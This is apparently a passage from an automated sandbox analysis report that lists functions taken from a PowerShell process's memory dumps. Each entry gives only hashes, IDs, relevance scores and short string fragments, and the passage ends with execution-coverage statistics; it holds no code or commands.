                                                • Instruction Fuzzy Hash: AB417131B002059FDB14DF64C894AAD7BB6EF88754F188468E806EB3A0DF749C81DB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F62C58 Relevance: .1, Instructions: 110COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 329dd0f89894172bfeeb393e73a2e496adad359002a9d71e45fd7f5b1d1503cc
                                                • Instruction ID: 1c10166bc5fe8c74beaa663d4353cb8d0376bcc09adfe9862cbaa68a80edee73
                                                • Opcode Fuzzy Hash: 329dd0f89894172bfeeb393e73a2e496adad359002a9d71e45fd7f5b1d1503cc
                                                • Instruction Fuzzy Hash: F54128B4A006059FCB45CF59C494DAEFBB1FF88310B15869AD815AB365C736FD90CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F68AFF Relevance: .1, Instructions: 91COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 013021ceeecb9ec3b765a6b049e51ea78c84ad60a66417d7ab1c5d2236fcffb4
                                                • Instruction ID: b1d04b7923fdcd124f5edfea53c807c5f53beafe30c38c84321c76e9954bf7c1
                                                • Opcode Fuzzy Hash: 013021ceeecb9ec3b765a6b049e51ea78c84ad60a66417d7ab1c5d2236fcffb4
                                                • Instruction Fuzzy Hash: 2A317C30B01118EFCF15DBA8D580AADB7F6AF89354F248569E402AB350DF30AD4ADB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F6A753 Relevance: .1, Instructions: 90COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8ef52a6736359c08ec40a1dc4436146099cdc9ccfafa0a0cdb69d56d098c5216
                                                • Instruction ID: f5fcc9acac92e84afe10de6dac86342861604d469bf81b1f3e7d1af832c94de4
                                                • Opcode Fuzzy Hash: 8ef52a6736359c08ec40a1dc4436146099cdc9ccfafa0a0cdb69d56d098c5216
                                                • Instruction Fuzzy Hash: 6C312D3590E3D04FCB138B719C64A517FB19F83254B1A80EBD488DF6A3D62D9D0ADB22
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F68818 Relevance: .1, Instructions: 89COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 21b7eb1d7603c74d8f2da31d2ba33e1fc74476191edf50a35b11c63cb85f8bed
                                                • Instruction ID: 76d2fda2ced98e47e31b9b0bdf13b3431a6a30ae82ba779e1cc6a2f5453e6e80
                                                • Opcode Fuzzy Hash: 21b7eb1d7603c74d8f2da31d2ba33e1fc74476191edf50a35b11c63cb85f8bed
                                                • Instruction Fuzzy Hash: 84316371B006049FDB14DF69D898AA97BB1EF88360F18016CE506EB3A2CF719C41CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F6C958 Relevance: .1, Instructions: 85COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3a8f2c9a717de8f88524a78d9ac840db4771be93c54339cabd3be77e1aba3ae2
                                                • Instruction ID: 68d9096a84d5ac08d4acd8fdf8d038102eb47ae004481449bc8b464976f8efb3
                                                • Opcode Fuzzy Hash: 3a8f2c9a717de8f88524a78d9ac840db4771be93c54339cabd3be77e1aba3ae2
                                                • Instruction Fuzzy Hash: 09311774A005099FCB04CF9CC8909AEFBF1FF89310B258299D998AB751C731EC91DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F631A0 Relevance: .1, Instructions: 69COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3284f4bff9fe605bdc56c887eb2d5f1274d80a28a39422926c7186d01289f464
                                                • Instruction ID: 3c5b67a9f9d1f8edd1a97e3a5f1d0b21ed0e64b9d421d7a13fa53dbd6b260ca1
                                                • Opcode Fuzzy Hash: 3284f4bff9fe605bdc56c887eb2d5f1274d80a28a39422926c7186d01289f464
                                                • Instruction Fuzzy Hash: 21217F74A042499FCB01DF98D8909AEBBF1FF89310B14809AE909EB352C331ED44CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F631C8 Relevance: .1, Instructions: 65COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9861aaf542336bafb304a7458d2933a6591e68ab0afac5d5fe1ce7c213ca8aa0
                                                • Instruction ID: ce9aa530b897ac08f76048fb5085cc7f0272ed062eb225814267c294de78a76b
                                                • Opcode Fuzzy Hash: 9861aaf542336bafb304a7458d2933a6591e68ab0afac5d5fe1ce7c213ca8aa0
                                                • Instruction Fuzzy Hash: 54215EB4A042099FCB00DF9CC8909AEBBF1FF89310B148196D919EB352C735ED41DBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F68420 Relevance: .1, Instructions: 64COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d8414895f13b9e5bf86491b8f64671b7559dc11d6c55dc1add516ff7f11fea13
                                                • Instruction ID: e37d369019701ff20cfaa0f9527ab51377715d655205c27c04fff245a38f7ad2
                                                • Opcode Fuzzy Hash: d8414895f13b9e5bf86491b8f64671b7559dc11d6c55dc1add516ff7f11fea13
                                                • Instruction Fuzzy Hash: 291196352053408FC715D768D444B55BBA9EF86364F1981EEE0088F6A3CB75D847C751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F639B0 Relevance: .1, Instructions: 63COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f7cc0f0e5ec8f4ae033328766424a31882f13b05bcc1180a8da6d4e60b56685e
                                                • Instruction ID: 6a4f7707a5261a5f59f9504d35819576928b34b8739b1e0a8c23ef6b3f772db0
                                                • Opcode Fuzzy Hash: f7cc0f0e5ec8f4ae033328766424a31882f13b05bcc1180a8da6d4e60b56685e
                                                • Instruction Fuzzy Hash: C221E7B4A00509DFCB04CF89C9809AAFBB1FF8C310B158169D919A7351C735ED51DBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0757688D Relevance: .1, Instructions: 63COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f1703f2b6317d5bad946cff9b20e03fd13087ac98a4cf8723afa09b27b64869e
                                                • Instruction ID: 34fe0596a768258100dcbc574698cdd98df2afcaba3f5aa02c1f9f6f98fa5f9f
                                                • Opcode Fuzzy Hash: f1703f2b6317d5bad946cff9b20e03fd13087ac98a4cf8723afa09b27b64869e
                                                • Instruction Fuzzy Hash: 121100B0649784AFD3128B24DC15B917FA5EF46710F08C4C7E6449F2C3CA75AC86C7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00DBD01D Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3196093327.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dbd000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b61d2f2fb510503be9343f51f545c456249d1189e9e8bdf187e0a212d76d380b
                                                • Instruction ID: 2cced5e95ff1cca09900dd8561953e64c1347c12777cc0fd04131e7ecc0edf2b
                                                • Opcode Fuzzy Hash: b61d2f2fb510503be9343f51f545c456249d1189e9e8bdf187e0a212d76d380b
                                                • Instruction Fuzzy Hash: 5C012671409340DAEB20AE29CDC4BA7BFA8DF41320F3CC41AEC4A0B246D379D845CAB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00DBD005 Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3196093327.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dbd000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 67a49f2b08efed58b82cbbdaa76ffd1e46b5718a0cf9b0e36b082e90ce8db342
                                                • Instruction ID: ab0296e5385a89fa4dee2bee1720a7784db5b260e51b7314666607d68e3bbf28
                                                • Opcode Fuzzy Hash: 67a49f2b08efed58b82cbbdaa76ffd1e46b5718a0cf9b0e36b082e90ce8db342
                                                • Instruction Fuzzy Hash: CF015E6140E3C09ED7128B258D94B92BFB4DF53224F1DC4DBE8888F2A7D2695C49C772
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F68410 Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fe7e694281c5457d998dfbbda86cfbe6625330a7a179b5f783994c57c4d6d8c8
                                                • Instruction ID: 62a98bf89bb74d5e747fc59874b4f1e14afe5e487ee711b362a0ac452c036ab3
                                                • Opcode Fuzzy Hash: fe7e694281c5457d998dfbbda86cfbe6625330a7a179b5f783994c57c4d6d8c8
                                                • Instruction Fuzzy Hash: 1C0126312043409FC725C708C808BA27BE8AF863A9F1981AED0488F263CF75DC47D751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F6820B Relevance: .0, Instructions: 38COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6ebdaef67102626fb9ced984f9d2ef1f51cb65496be00359a6deaee5f0561f91
                                                • Instruction ID: e35da303df05bd64463c91d32453d127ab3e0730e816181daad29eb088383613
                                                • Opcode Fuzzy Hash: 6ebdaef67102626fb9ced984f9d2ef1f51cb65496be00359a6deaee5f0561f91
                                                • Instruction Fuzzy Hash: B6016275D0060A8FC740DF68D4459AABFF0FF09314F204299EA45DB762D731A981DBD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F683B0 Relevance: .0, Instructions: 29COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7244205d9c0b4ffc1332993a32b1cbd4b0847c32af331fdb2fbaa4be16a439b1
                                                • Instruction ID: 0ffecb90d7f10de7a9bc3e498b372d2159fc6ac193a9ccfd99822a77af62a90f
                                                • Opcode Fuzzy Hash: 7244205d9c0b4ffc1332993a32b1cbd4b0847c32af331fdb2fbaa4be16a439b1
                                                • Instruction Fuzzy Hash: 57F065356012158FC305DB10D1146A5BB61EB853D9F0582EED0498F2A3CF39D947D755
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F68218 Relevance: .0, Instructions: 28COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 278ce1428344202becd69c1e5157b505849c528b166144c2f09f22ebfd623f5d
                                                • Instruction ID: 3613b3ee567b285c95275a8839637bd08020124d2ef2a8b2194a33b219c47e5b
                                                • Opcode Fuzzy Hash: 278ce1428344202becd69c1e5157b505849c528b166144c2f09f22ebfd623f5d
                                                • Instruction Fuzzy Hash: A4F0A9B4E0020A8FCB80DFA8C485AAEBBF1FF49314F604199E909DB321D730A955CBD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F6A458 Relevance: .0, Instructions: 26COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 96e837727a97d86e15b9e93441fda7ede750d0980c8d2726b984e581f0c97e72
                                                • Instruction ID: c43166b648a26fa0c4d739e7aaff5ac8357a376338a9980a70563f7039bc0700
                                                • Opcode Fuzzy Hash: 96e837727a97d86e15b9e93441fda7ede750d0980c8d2726b984e581f0c97e72
                                                • Instruction Fuzzy Hash: 7BE022322002016BC700E728D885A9A3762EFC5340B104429F201CB659DF6CAC42ABA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F683D0 Relevance: .0, Instructions: 18COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ec1b8a624990d9bc6d34841bec3e1ac10e0ca624738b27bf40381df71222cafa
                                                • Instruction ID: 5ffe05f51b0a02482b1b5b680ae3be923adaa0ce782a7c5e3092fb0198fa5f18
                                                • Opcode Fuzzy Hash: ec1b8a624990d9bc6d34841bec3e1ac10e0ca624738b27bf40381df71222cafa
                                                • Instruction Fuzzy Hash: 4ED0A7322482919FCB039220B4240A57F24A9433A931445EBE108CE443DD25C047D773
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 07572430 Relevance: 15.5, Strings: 12, Instructions: 457COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$4'cq$tPcq$tPcq$$cq$$cq$$cq$$cq$ml$ml
                                                • API String ID: 0-1864781066
                                                • Opcode ID: 1ee39a0cc1e3b6aa3c49dd9df440bb30e98887a336863e6ede12da917d620cf4
                                                • Instruction ID: 5eea63584decfdbb0fd0e55b5d6b1c0f28a1cb87034f94beb8063fd89a335c5b
                                                • Opcode Fuzzy Hash: 1ee39a0cc1e3b6aa3c49dd9df440bb30e98887a336863e6ede12da917d620cf4
                                                • Instruction Fuzzy Hash: 8BE13BB17043468FCB259A79A8116A6BFF2BFC6310F1484AFD545CF292DA31C881C7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 075750C8 Relevance: 12.9, Strings: 10, Instructions: 400COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$4'cq$$cq$$cq$$cq$$cq$$cq$$cq
                                                • API String ID: 0-3550717347
                                                • Opcode ID: cb18b9e983354ba2fb7e76b71f2da68a0ed766affd8aad593d8d850b8a6b6541
                                                • Instruction ID: 9e36115d2d151903197c83c4315e3f5e5c3c347ad8d2a5ffd96e21e12117f169
                                                • Opcode Fuzzy Hash: cb18b9e983354ba2fb7e76b71f2da68a0ed766affd8aad593d8d850b8a6b6541
                                                • Instruction Fuzzy Hash: E3C13AB170020A8FCB258F79E8416BABBA6BFC5311F24847BD445CB251FB72C961C7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07574AF8 Relevance: 12.8, Strings: 10, Instructions: 310COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$4'cq$tPcq$tPcq$$cq$$cq$$cq$$cq
                                                • API String ID: 0-3490351150
                                                • Opcode ID: da6def2708c9ea75afbea5821ff991944b750819da96f4780d08adb3eca6044c
                                                • Instruction ID: 4f645661934f9ef36d56a4f724e80de06e52b5072dea6a7afb1cd84ee4a79872
                                                • Opcode Fuzzy Hash: da6def2708c9ea75afbea5821ff991944b750819da96f4780d08adb3eca6044c
                                                • Instruction Fuzzy Hash: 07A119B1B002569FCB249F68E4416FABBA6FBC9320F14C46BD9458B281DF31DD41CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07570638 Relevance: 7.8, Strings: 6, Instructions: 331COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$$cq$$cq$$cq$$cq
                                                • API String ID: 0-915829551
                                                • Opcode ID: 8b8c74118a8f124c78afd8c1a124f9257f4ccd230ca3428885beb24c08174e18
                                                • Instruction ID: 7eacb831a70d41d8f59db53cdb95df5ce6a33062723705d8dc0110a1a8522a04
                                                • Opcode Fuzzy Hash: 8b8c74118a8f124c78afd8c1a124f9257f4ccd230ca3428885beb24c08174e18
                                                • Instruction Fuzzy Hash: 34B106F1B14216DFDB248B69E8516BABBE6FFC5310F14846BD5088B2D1DB31D841CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00F60EC8 Relevance: 7.6, Strings: 6, Instructions: 70COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: p$p$p$p$p$p
                                                • API String ID: 0-222779563
                                                • Opcode ID: 489e1b3b8cf8e7f69f4f8f76714617fd992edc61f4244812e8e1bcc10e6f4494
                                                • Instruction ID: 6438082e7da11f62f0d314aeda740aedadd62e54139138d14cc98c934108b885
                                                • Opcode Fuzzy Hash: 489e1b3b8cf8e7f69f4f8f76714617fd992edc61f4244812e8e1bcc10e6f4494
                                                • Instruction Fuzzy Hash: D0118456C0E3D15FE31A4224A8652937F25CB67285F1902E38CD8CF1E3E84C0D0BC792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07574ADD Relevance: 6.4, Strings: 5, Instructions: 123COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$tPcq$$cq$$cq$$cq
                                                • API String ID: 0-481192504
                                                • Opcode ID: eb16171489fa5e902cdf0c8813814dc4817a6670c55612f7f9f6a52c9c14afe6
                                                • Instruction ID: 8e80df3e861ea47364e9d8ada567db2ee05f8432e69ebe8e2b95b5f3e9129c06
                                                • Opcode Fuzzy Hash: eb16171489fa5e902cdf0c8813814dc4817a6670c55612f7f9f6a52c9c14afe6
                                                • Instruction Fuzzy Hash: 9641D2B1A04285DFDF34CE45E5407E6B7AABF85320F19C4ABD9199B291C731DC80CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07575290 Relevance: 6.3, Strings: 5, Instructions: 79COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$$cq$$cq$$cq$$cq
                                                • API String ID: 0-420214106
                                                • Opcode ID: 3fa6b4c273e20e5939146b867c624b58077433ef6570e27e1d109dada13d7bbc
                                                • Instruction ID: d9d5ec3610a6bb6a360a01a4624467d8565260707849bf909da3c70d810e9ede
                                                • Opcode Fuzzy Hash: 3fa6b4c273e20e5939146b867c624b58077433ef6570e27e1d109dada13d7bbc
                                                • Instruction Fuzzy Hash: CA21E0F161120EDFDB348E16E580BF573A5BF41211F58846BE8058B271F7B1D8A0C691
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 075700F0 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $cq$$cq$$cq$ml$ml
                                                • API String ID: 0-125666307
                                                • Opcode ID: b7bae60d237966eecadaa2653c886dbc9ca273c4179a8906082eb71f3c85d90f
                                                • Instruction ID: 0b0b5bcef97314d0a4bbb8ced897defbc057cf9d8b6847a8fdf72f24c8784007
                                                • Opcode Fuzzy Hash: b7bae60d237966eecadaa2653c886dbc9ca273c4179a8906082eb71f3c85d90f
                                                • Instruction Fuzzy Hash: C111E9B17103169BEB24592AEC047A7F7D7BBC1761F28842BE44D862D1EA31D481C3D1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07575578 Relevance: 5.1, Strings: 4, Instructions: 104COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $cq$$cq$$cq$$cq
                                                • API String ID: 0-2876200767
                                                • Opcode ID: 82a390088f8592335051da4e31e837569f515f82e82640dfaaaf86619deccab2
                                                • Instruction ID: e87430c704d99fce71c82bc19ff28dfb998fcb21a0e877c72a5246102ad00684
                                                • Opcode Fuzzy Hash: 82a390088f8592335051da4e31e837569f515f82e82640dfaaaf86619deccab2
                                                • Instruction Fuzzy Hash: 3C3139F27102166BDA345939A8027BB7B9BABC1754F54843AA901CF382FE76CC50C3B1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07576B38 Relevance: 5.1, Strings: 4, Instructions: 104COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 84ul$84ul$tPcq$tPcq
                                                • API String ID: 0-973537647
                                                • Opcode ID: 8193a7caf9112cfe970b71c781873d5a637c93c483ae59af24be3a4bfbbb0d74
                                                • Instruction ID: c98a67110cfadd52a3c6b87177a6e6c10aebb78b7c129b13baa7f5c150d2199d
                                                • Opcode Fuzzy Hash: 8193a7caf9112cfe970b71c781873d5a637c93c483ae59af24be3a4bfbbb0d74
                                                • Instruction Fuzzy Hash: C33149B06042555FC7119B6858106AABFB5EF8A320F59849BE944DF3D2CB719C84C7F2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07570CB8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $cq$$cq$$cq$$cq
                                                • API String ID: 0-2876200767
                                                • Opcode ID: cd78ed2e6b1290a4059e744c0cf582d449fa02da4b8a3c69995dce22ce176be0
                                                • Instruction ID: b7088f903189f1ab1eb0a289271f551d6e496fa36657e14479ab696c550f0bf7
                                                • Opcode Fuzzy Hash: cd78ed2e6b1290a4059e744c0cf582d449fa02da4b8a3c69995dce22ce176be0
                                                • Instruction Fuzzy Hash: 782137F23103169BDB745979A8857A3BBEABBC0710F24842BA50DCB3C2DD75E841C362
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:6.4%
                                                Dynamic/Decrypted Code Coverage:9.2%
                                                Signature Coverage:1.5%
                                                Total number of Nodes:2000
                                                Total number of Limit Nodes:84
